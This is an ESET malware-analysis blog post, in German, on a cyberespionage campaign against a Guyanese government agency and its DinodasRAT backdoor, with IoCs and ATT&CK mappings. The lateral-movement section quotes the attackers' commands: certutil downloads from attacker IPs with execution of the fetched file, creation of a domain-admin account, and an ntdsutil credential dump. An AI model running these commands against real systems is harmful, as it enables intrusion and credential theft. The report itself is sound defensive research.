Im Februar 2023 entdeckten ESET-Forscher eine Spearphishing-Kampagne, die auf eine staatliche Einrichtung in Guyana abzielte. Obwohl wir die Kampagne, die wir Operation Jacana nannten, keiner bestimmten APT-Gruppe zuordnen konnten, gehen wir mit mittlerer Sicherheit davon aus, dass eine mit China verbundene Bedrohungsgruppe hinter diesem Vorfall steckt.

Bei dem Angriff verwendeten die Betreiber eine bisher nicht dokumentierte C++-Backdoor, die Dateien exfiltrieren, Windows-Registrierungsschlüssel manipulieren, CMD-Befehle ausführen und vieles mehr kann. Wir haben die Backdoor DinodasRAT genannt, basierend auf der Opferkennung, die sie an ihr C&C sendet: Die Zeichenfolge beginnt immer mit Din, was uns an den Hobbit Dinodas aus Herr der Ringe erinnert.

Die wichtigsten Punkte dieses Blogposts:

  • Operation Jacana ist eine gezielte Cyberspionage-Kampagne gegen eine staatliche Einrichtung in Guyana.
  • Nach der anfänglichen Kompromittierung über Spearphishing-E-Mails drangen die Angreifer in das interne Netzwerk des Opfers ein.
  • Um sensible Daten zu extrahieren, verwendeten die Angreifer eine bisher nicht dokumentierte Hintertür, die wir DinodasRAT nannten.
  • DinodasRAT verschlüsselt die Informationen, die es an den C&C sendet, mit dem Tiny Encryption Algorithm (TEA).
  • Neben DinodasRAT setzten die Angreifer auch Korplug ein, was uns zu der Vermutung veranlasst, dass die Betreiber aus China hinter dieser Operation stehen.

Diese Kampagne wurde gezielt durchgeführt, da die Bedrohungsakteure ihre E-Mails speziell auf die ausgewählte Opferorganisation ausgerichtet haben. Nachdem sie die ersten Rechner erfolgreich mit DinodasRAT kompromittiert hatten, gingen die Betreiber "seitlich" weiter und drangen in das interne Netzwerk des Ziels ein, wo sie erneut die DinodasRAT-Backdoor sowie weitere bösartige Tools, darunter eine Variante von Korplug (auch bekannt als PlugX), einsetzten. Eine Übersicht über den Ablauf der Kompromittierung bei der Operation Jacana ist in Abbildung 1 dargestellt.

01_compromise_flow
Abbildung 1. Ablauf der Kompromittierung von Operation Jacana

Zuschreibung

Zum Zeitpunkt der Erstellung dieses Berichts konnten wir Operation Jacana keiner bekannten Gruppe zuordnen. Dank eines Hinweises, den wir gefunden haben, haben wir jedoch das Gefühl, dass wir in Bezug auf die Täter nicht völlig im Dunkeln tappen. Während des Angriffs setzten die Bedrohungsakteure eine Variante von Korplug (auch bekannt als PlugX) ein, die für chinesisch orientierte Gruppen üblich ist - zum Beispiel: Alte Tricks, neue Korplug-Variante: Hodur von Mustang Panda.

Obwohl wir nur mit mittlerer Sicherheit davon ausgehen können, dass es sich um einen mit China verbündeten Bedrohungsakteur handelt, wird diese Hypothese durch die jüngsten Entwicklungen in den diplomatischen Beziehungen zwischen Guyana und China gestützt. Im Februar 2023, demselben Monat, in dem die Operation Jacana stattfand, verhaftete die Spezialeinheit für organisierte Kriminalität (Special Organised Crime Unit, SOCU) von Guyana drei Personen im Rahmen einer Geldwäscheuntersuchung, an der chinesische Unternehmen beteiligt waren, was von der chinesischen Botschaft vor Ort bestritten wurde. Außerdem hat China im Rahmen der "Belt and Road Initiative" wirtschaftliche Interessen in Guyana.

Erster Zugang

Als ersten Schritt zum Eindringen in das Netzwerk ihres Opfers schickten die hinter der Operation Jacana stehenden Bedrohungsakteure Spearphishing-E-Mails an die Zielorganisation, die sich auf öffentliche Angelegenheiten in Guyana bezogen. Wir beobachteten die folgenden Betreffzeilen:

  • President Mohamed Irfaan Ali's Official Visit to Nassau, The Bahamas
    (Offizieller Besuch von Präsident Mohamed Irfaan Ali in Nassau, Bahamas)
  • Guyanese fugitive in Vietnam
    (Guyanischer Flüchtling in Vietnam)

Ausgehend von den E-Mail-Betreffzeilen müssen die Betreiber das politische Geschehen in Guyana verfolgt haben - der Zeitpunkt, zu dem wir bei der angegriffenen Regierungseinrichtung neue Entdeckungen registrierten, fiel mit der Teilnahme des guyanischen Präsidenten an der CARICOM-Konferenz in Nassau zusammen.

Die Spearphishing-E-Mails enthielten einen Link, der beim Anklicken eine ZIP-Datei von https://fta.moit.gov[.]vn/file/people.zip herunterlud. Da eine Domain, die auf gov.vn endet, auf eine vietnamesische Regierungswebsite hinweist, gehen wir davon aus, dass die Betreiber in der Lage waren, eine andere Regierungseinrichtung zu kompromittieren und diese als Host für ihre Malware-Samples zu nutzen. Wir haben das VNCERT über die kompromittierte Infrastruktur informiert.

Sobald das Opfer die ZIP-Datei, die nicht passwortgeschützt war, entpackt und die darin enthaltene ausführbare Datei gestartet hat, wurde es mit der DinodasRAT-Malware infiziert. Die extrahierten Dateinamen stehen im Zusammenhang mit den Betreffzeilen der Phishing-E-Mails:

  • Guyanese fugitive in Vietnam20220101to20230214Guyanese fugitive in Vietnam.docx.exe
  • The Bahamas/President Mohamed Irfaan Ali’s Official Visit to Nassau, The Bahamas.doc.exe

Seitliche Bewegung

Nachdem sie in ihr Ziel eingedrungen waren, bewegten sich die Angreifer durch das interne Netzwerk des Opfers. Laut unserer Telemetrie wurden BAT/Impacket.M und ähnliche Erkennungen im Netzwerk ausgelöst, was auf die Verwendung von Impacket oder eines ähnlichen WMI-basierten Lateral Movement Tools hindeutet.

Einige der Befehle, die die Angreifer im Netzwerk ausführten, sind:

  • certutil -urlcache -split http://23.106.123[.]166/vmtools.rar
  • net user test8 Test123.. /add /do
  • net group "domain admins" test8 /add /do
  • certutil -urlcache -split -f http://23.106.122[.]5/windowsupdate.txt c:\programdata\windowsupdate.txt
  • cd c:\programdata\
  • c:\programdata\windowsupdate.exe
  • powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

Mit dem letzten Befehl wird ntds.dit mit dem LOLBin ntdsutil.exe gespeichert. Dies ermöglicht das Dumping von Passwörtern, die auf einem Windows-Server gespeichert sind.

Toolset

DinodasRAT

DinodasRAT ist ein bisher nicht dokumentierter, in C++ entwickelter Fernzugriffstrojaner (Remote Access Trojan - RAT) mit verschiedenen Funktionen, die es einem Angreifer ermöglichen, den Computer eines Opfers auszuspionieren und sensible Informationen zu sammeln.

Bei der Ausführung prüft die Malware zunächst, ob drei Argumente übergeben wurden. Falls vorhanden, müssen diese Argumente die folgenden Informationen in der folgenden Reihenfolge enthalten:

  1. den Buchstaben d,
  2. eine Zahl, die eine Prozess-ID ist, und
  3. einen vollständigen Dateipfad.

Wenn alle drei Argumente übergeben wurden, beendet DinodasRAT den durch die Prozess-ID repräsentierten Prozess mit Hilfe der Windows-API TerminateProcess und löscht dann mit Hilfe der Windows-API DeleteFileW die im dritten Argument übergebene Datei. Danach beendet der Prozess seine Ausführung mit Hilfe der Exit-Funktion der C++-Standardbibliothek. Dies ist höchstwahrscheinlich als Deinstallationsfunktion gedacht.

Wenn keine Argumente übergeben wurden, setzt DinodasRAT seine Ausführung fort, indem er eine Mutex namens Client erstellt und prüft, ob das herkömmliche Windows-Verzeichnis C:\ProgramData existiert. Wenn es existiert, erstellt die Malware ein Unterverzeichnis namens Application Doc, das für die Zuweisung einer Konfigurationsdatei und anderer Dateien im Zusammenhang mit der Hintertür verwendet wird. Falls das Windows-Verzeichnis nicht existiert, erstellt DinodasRAT einen Pfad im Stammverzeichnis namens Program.Files\Application.Doc. Die Zeichenfolgen Application Doc, ProgramData und Program.Files\Application.Doc werden mit dem Tiny Encryption Algorithm (TEA) verschlüsselt.

Das Verzeichnis Application Doc wird mit den Attributen Read-only und Hidden erstellt. Innerhalb des Verzeichnisses Application Doc erstellt DinodasRAT zwei Unterverzeichnisse mit den Namen 0 und 1. Sobald das Verzeichnis existiert, legt die Malware drei Threads an, die für die Datensammlung und -exfiltration verwendet werden. Eine detaillierte Beschreibung ihres Verhaltens findet sich in Tabelle 1.

Tabelle 1. Thread-Beschreibungen

Thread Description
1

Take a screenshot of the display of the victim’s machine every five minutes using Windows API functions like CreateDCW, BitBlt, DeleteDC, or ReleaseDC. The screenshot is compressed and saved in the subdirectory Application Doc\0.

In order to compress the screenshot, the attackers use the zlib library, version 1.2.11.

The format of the filename used for the saved screenshots is the following: <YYYYMMDDHHMMSS>_<five random digits>_<one random digit>.jpg

2

Get the content of the clipboard every five minutes using the Windows API function GetClipboardData and save it in the subdirectory Application Doc\1.

The format of the filename used for the clipboard data file is the following: DateTimeStamp_<five random digits>_<one random digit>.txt

3 Loops through the subdirectories 0 and 1 and sends the filenames, encrypted with TEA and base64 encoded, to the C&C server. If the C&C server replies, it creates another packet in order to send the filename with its data. Finally, it deletes the file from the victim’s machine.

Nachdem die Threads gestartet wurden, erstellt DinodasRAT eine Datei namens conf.ini im Hauptverzeichnis. Diese Datei enthält eine ID, mit der das Opfer gegenüber dem C&C-Server identifiziert werden kann.

Abbildung 2 zeigt ein Beispiel für die in der Datei conf.ini gespeicherte ID.

Figure 2 Example of ID saved in conf.ini file
Abbildung 2. Beispiel für eine in der Datei conf.ini gespeicherte ID

Das Format der ID lautet Din_<YYYYMMDD>_<MD5-HASH>_<RANDOM-VALUE>_V1, wobei:

  • <YYYYMMDD> das Installationsdatum ist,
  • <MD5-HASH> wird anhand der IP-Adresse des Opfers und des Installationsdatums in Millisekunden berechnet,
  • <RANDOM-VALUE> ist ein Zufallswert, und
  • V1 ist wahrscheinlich die Malware-Version.

TEA: Winziger Verschlüsselungsalgorithmus

DinodasRAT verwendet TEA, um einige seiner Strings zu entschlüsseln und um Daten zu ver- und entschlüsseln, die an seinen C&C-Server gesendet oder von diesem empfangen werden. TEA, oder Tiny Encryption Algorithm, ist eine einfache Blockchiffre, die sich durch ihre einfache Implementierung in Software und Hardware auszeichnet. Die ursprüngliche Referenzimplementierung seiner Verschlüsselungsfunktion besteht beispielsweise aus nur wenigen Zeilen C-Code, mit einer sehr kurzen Einrichtungszeit und ohne Tabellen mit voreingestellten Werten. DinodasRAT setzt den Algorithmus im Cipher-Block-Chaining (CBC)-Modus ein. In einigen Fällen werden die verschlüsselten Daten zusätzlich mit base64 verschlüsselt, bevor sie an den C&C-Server gesendet werden.

Wir haben festgestellt, dass die Malware drei verschiedene Schlüssel enthält, die für unterschiedliche Verschlüsselungs-/Entschlüsselungsszenarien verwendet werden (siehe Tabelle 2).

Tabelle 2 :Von DinodasRAT verwendete TEA-Schlüssel

Key N Value Description
1 A1 A1 18 AA 10 F0 FA 16 06 71 B3 08 AA AF 31 A1 Used mainly to encrypt/decrypt communications with the C&C server.
2 A0 21 A1 FA 18 E0 C1 30 1F 9F C0 A1 A0 A6 6F B1 Used to encrypt the name of the files created in the screenshot functionality, before they are sent to the C&C server.
3 11 0A A8 E1 C0 F0 FB 10 06 71 F3 18 AC A0 6A AF Used to decrypt the installation paths.

Es ist möglich, dass sich die Angreifer für TEA entschieden haben, um sich die Arbeit zu erleichtern - wir haben Grund zu der Annahme, dass die Implementierung des Algorithmus durch die Malware nicht von Grund auf neu erstellt wurde, sondern eventuell aus dem Blogpost Tea Algorithm - C++ von BlackFeather übernommen wurde.

C&C-Kommunikation und bösartige Aktivitäten

Um mit dem C&C-Server zu kommunizieren, verwendet DinodasRAT die Winsock-Bibliothek, um einen Socket zu erstellen, der das TCP-Protokoll verwendet. Obwohl TCP das Standardprotokoll ist, das zum Senden und Empfangen von Informationen vom C&C-Server verwendet wird, haben wir gesehen, dass DinodasRAT in der Lage ist, zum UDP-Protokoll zu wechseln.

Die Backdoor erstellt außerdem verschiedene Threads für unterschiedliche Zwecke, z. B. zur Manipulation eines empfangenen Befehls, der auf dem Computer des Opfers ausgeführt werden soll. Um eine synchronisierte Kommunikation aufrechtzuerhalten, nutzt DinodasRAT Windows-Ereignisobjekte mit Hilfe von Windows-API-Funktionen wie CreateEventW, SetEventW und WaitForSingleObject.

Um die Hauptkommunikation mit dem C&C-Server zu starten, sendet DinodasRAT ein Paket mit grundlegenden Informationen über den Computer des Opfers und seine Konfiguration, wie z. B.:

  • Windows-Version,
  • Betriebssystem-Architektur,
  • den Benutzernamen,
  • den Malware-Ausführungspfad, kodiert in base64, und
  • einen für das UDP-Protokoll verwendeten Wert, der standardmäßig 800 beträgt.

Abbildung 3 zeigt nicht nur die grundlegenden Informationen, die über das Opfer gesammelt wurden, sondern auch die von der Malware generierte ID, die als Opferkennung für den C&C-Server dient.

Figure 3 Basic information before its encryption
Abbildung 3. Grundlegende Informationen vor ihrer Verschlüsselung

Alle Informationen, die DinodasRAT über das TCP-Protokoll an den C&C-Server sendet, sind TEA-verschlüsselt. Darüber hinaus sind einige der Informationen auch base64-kodiert.

Um die gestohlenen Informationen an den C&C-Server zu senden, erstellt DinodasRAT ein Paket, das Folgendes enthält:

  • Erstes Byte: eine ID, die möglicherweise anzeigt, ob die Daten TEA-verschlüsselt(0x30) oder base64-kodiert und TEA-verschlüsselt(0x32) sind.
  • Nächstes DWORD: Größe der verschlüsselten Daten.
  • Verbleibende Bytes: verschlüsselte Daten.

Abbildung 4 zeigt ein Beispiel für ein verschlüsseltes Paket, das an den C&C-Server gesendet wird.

Figure 4 encrypted packet example
Abbildung 4. Beispiel für ein verschlüsseltes Paket

Während unserer Analyse war es uns nicht möglich, eine Antwort vom C&C-Server zu erhalten, aber wir konnten feststellen, dass alle vom Server empfangenen Pakete ebenfalls mit TEA verschlüsselt werden sollten.

Für die Verarbeitung der vom C&C-Server empfangenen Befehle erstellt DinodasRAT einen Thread mit einer Endlosschleife, der für den Empfang und die Feststellung zuständig ist, ob die Pakete verschlüsselte Befehle zur Ausführung enthalten.

Ein einmal entschlüsseltes Paket enthält die folgende Struktur:

  • Erstes DWORD: ID der auszuführenden Aktion, Hex-Wert (siehe Tabelle 2).
  • Zweites DWORD: eine weitere ID, die auf der Client-Seite angibt, dass es sich bei diesem Paket um einen Befehlswert (in Hexadezimalwerten) handelt, der auf dem Rechner des Opfers ausgeführt werden soll.
  • Rest des Pakets: Daten, die von dem auszuführenden Befehl verwendet werden.

DinodasRAT enthält Befehle, mit denen verschiedene Aktionen auf dem Computer des Opfers oder auf der Malware selbst ausgeführt werden können. In Tabelle 3 sind die unterstützten Befehle mit einer kurzen Beschreibung aufgeführt.

Tabelle 3. DinodasRAT-Befehle

Command ID

Description

0x02

List the contents of a specific directory.

0x03

Delete a file or the content of a directory.

0x04

Change the attribute of a file to hidden or normal.

0x05

Send files to the C&C server.

0x06

Set an event object used for command 0x05.

0x08

Modify a binary file with bytes received from the C&C server or execute a command using CreateProcessW.

0x09

Set an event object used for command 0x08.

0x0D

Write a variable called va, with its value, in the conf.ini file.

0x0E

Enumerate running processes.

0x0F

Terminate a process by its process ID.

0x10

List services on the victim’s machine.

0x11

Start or delete a service.

0x12

Get info from a Windows registry key.

0x13

Delete a Windows registry key.

0x14

Create a Windows registry key.

0x15

Execute a file or a command using the CreateProcessW Windows API.

0x16

Execute a command using the CreateProcessW Windows API.

0x17

Receive a domain and execute nslookup with that domain to create another socket with the IP address.

0x18

Receive and execute a command using Windows APIs CreateProcessW, PeekNamedPipe, and ReadFile.

0x19

Same as command 0x18.

0x1A

Set an event object used for commands 0x18, 0x19, and 0x1B.

0x1B

Interactive reverse shell.

0x1D

File manipulation; rename, copy, move files, etc.

0x1E

Set the string ok to a global variable and send that value to the C&C server.

0x1F

Write a variable called mode with its value into the conf.ini file.

0x20

Write a variable called ptype with its value into the conf.ini file.

0x21

Get or set a variable called fmode with its value in the conf.ini file.

0x22

Terminate malware execution.

0x24

Write the variables s and sub, with their respective values, into a file named p.ini. Both variables can have a Boolean value of true or false.

0x25

Configurate the event and global variables related with the take screenshot thread.

0x26

Write a variable called c with its value into a file named p.ini.

0x29

Modify the value of a global variable used for the UDP protocol, default value 0x800.

Während unserer Untersuchung haben wir nur die Erstellung und Verwendung der ID-Variable mit dem entsprechenden Wert in der Datei conf.ini gesehen, die verwendet wird, um das Opfer dem C&C-Server zu melden.

Zusätzlich verwendet DinodasRAT eine globale Mehrzweckvariable, die beispielsweise den Pfad eines zu löschenden Dateinamens oder den Namen eines zu erstellenden Windows-Registrierungsunterschlüssels enthalten kann.

Andere Malware-Samples

Neben DinodasRAT setzten die Angreifer während des Einbruchs auch andere Tools ein:

  • Eine Variante von Korplug (auch bekannt als PlugX) - eine Backdoor, die typischerweise von in China ansässigen Bedrohungsgruppen verwendet wird.
  • Ein SoftEther-VPN-Client. Dieser wurde wahrscheinlich verwendet, um lokale Ports, wie RDP, an den C&C-Server weiterzuleiten.

Schlussfolgerung

Bei der Operation Jacana handelt es sich um eine Cyberspionage-Kampagne, die sich gegen eine staatliche Einrichtung in Guyana richtete. Wir gehen mit mittlerer Sicherheit davon aus, dass sie von einer mit China verbündeten APT-Gruppe durchgeführt wurde.

Die Angreifer verwendeten eine Kombination aus bisher unbekannten Tools, wie DinodasRAT, und eher traditionellen Backdoors wie Korplug.

Ausgehend von den Spearphishing-E-Mails, die verwendet wurden, um sich Zugang zum Netzwerk des Opfers zu verschaffen, verfolgen die Betreiber die geopolitischen Aktivitäten ihrer Opfer, um die Wahrscheinlichkeit eines Erfolgs ihrer Operation zu erhöhen.

Wenn Sie Fragen zu unserer auf WeLiveSecurity veröffentlichten Forschung haben, kontaktieren Sie uns bitte unter threatintel@eset.com.
ESET Research bietet private APT Intelligence Reports und Datenfeeds an. Wenn Sie Fragen zu diesem Service haben, besuchen Sie die ESET Threat Intelligence Seite.

IoCs

Eine Liste der IoCs finden Sie auch in unserem GitHub Repository.

Dateien

SHA-1

Filename

ESET detection name

Description

599EA9B26581EBC7B4BDFC02E6C792B6588B751E

President Mohamed Irfaan Ali's Official Visit to Nassau, The Bahamas.doc.exe

Win32/DinodasRAT.A

DinodasRAT.

EFD1387BB272FFE75EC9BF5C1DD614356B6D40B5

people.zip

Win32/DinodasRAT.A

ZIP file containing DinodasRAT.

9A6E803A28D27462D2DF47B52E34120FB2CF814B

President Mohamed Irfaan Ali's Official Visit to Nassau, The Bahamas.exe

Win32/DinodasRAT.B

DinodasRAT.

33065850B30A7C797A9F1E5B219388C6991674DB

114.exe

Win32/DinodasRAT.B

DinodasRAT.

Netzwerk

IP

Domain

Hosting provider

First seen

Details

23.106.122[.]5

N/A

Leaseweb Asia Pacific pte. ltd.

2023‑03‑29

Hosts other malicious components.

23.106.122[.]46

N/A

IRT-LSW-SG

2023‑02‑13

Hosts other malicious components.

23.106.123[.]166

N/A

Leaseweb Asia Pacific pte. ltd.

2023‑02‑15

Hosts other malicious components.

42.119.111[.]97

fta.moit.gov[.]vn

FPT Telecom Company

2023‑02‑13

Hosts DinodasRAT in a compressed file.

115.126.98[.]204

N/A

Forewin Telecom Group Limited, ISP at, HK

2023‑05‑08

C&C server for DinodasRAT.

118.99.6[.]202

N/A

Edward Poon

2023‑02‑02

C&C server for DinodasRAT.

199.231.211[.]19

update.microsoft-setting[.]com

Dash Networks Inc.

2022‑11‑07

C&C server for DinodasRAT.

MITRE ATT&CK-Techniken

Tactic

ID

Name

Description

Resource Development

T1583.003

Acquire Infrastructure: Virtual Private Server

Operators have used VPS servers for hosting their payloads.

T1587.001

Develop Capabilities: Malware

Operators made custom malware for the operation.

T1608.001

Stage Capabilities: Upload Malware

Operators have used servers to upload malware.

T1584.004

Compromise Infrastructure: Server

Operators have compromised servers to host their payloads.

T1588.001

Obtain Capabilities: Malware

Operators have used a variant of the Korplug backdoor in this operation.

T1588.002

Obtain Capabilities: Tool

Operators have used tools such as Impacket and SoftEther.

Initial Access

T1566.002

Phishing: Spearphishing Link

Operators made use of scheduled tasks to persist their malware.

Execution

T1059.001

Command and Scripting Interpreter: PowerShell

Operators have used PowerShell to execute commands on the victim’s network.

T1059.003

Command and Scripting Interpreter: Windows Command Shell

Operators have used Windows command shell to execute commands on the victim’s internal network.

T1059.005

Command and Scripting Interpreter: Visual Basic

Operators have used VBScripts.

T1106

Native API

DinodasRAT uses APIs, e.g., CreateProcessW, to execute CMD commands on the victim’s machine.

T1204.001

User Execution: Malicious Link

Operators have relied on their victims to open a link to download their malware.

T1204.002

User Execution: Malicious File

Operators have relied on their victims to execute their malware.

Defense Evasion

T1140

Deobfuscate/Decode Files or Information

DinodasRAT compresses files before they are sent to the C&C server.

DinodasRAT also uses TEA to decrypt strings.

T1036.007

Masquerading: Double File Extension

Operators have used “double extensions” to trick victims into executing their malware.

T1070.004

Indicator Removal: File Deletion

DinodasRAT is capable of self-deletion from the victim’s machine.

T1564.001

Hide Artifacts: Hidden Files and Directories

To evade detection, DinodasRAT creates hidden folders.

Persistence

T1078.002

Valid Accounts: Domain Accounts

Operators have created domain accounts to maintain persistent access to the victim’s internal network.

T1053

Scheduled Task/Job

Operators made use of scheduled tasks to persist their malware.

Credential Access

T1003.003

OS Credential Dumping: NTDS

Operators abused ntdsutil.exe to dump credentials.

Discovery

T1083

File and Directory Discovery

DinodasRAT can list the contents of a directory or a file.

T1012

Query Registry

DinodasRAT can obtain information from Windows registry keys.

T1057

Process Discovery

DinodasRAT can obtain information about the processes running on the victim’s machine.

T1007

System Service Discovery

DinodasRAT can obtain information about the services running on the victim’s machine.

T1082

System Information Discovery

DinodasRAT retrieves information like Windows version from the victim’s machine.

Collection

T1115

Clipboard Data

DinodasRAT can obtain information located on the clipboard of the victim’s machine.

T1113

Screen Capture

DinodasRAT can take screenshots on the victim’s machine.

Command and Control

T1573.001

Encrypted Channel: Symmetric Cryptography

DinodasRAT has used TEA for encrypting C&C server communications.

T1095

Non-Application Layer Protocol

DinodasRAT has used TCP or UDP protocols for its connection to the C&C server.

T1132

Data Encoding

DinodasRAT uses base64 encoding for strings and data sent to its C&C server.

Exfiltration

T1041

Exfiltration Over C2 Channel

DinodasRAT exfiltrates data over the same channel used for its C&C server.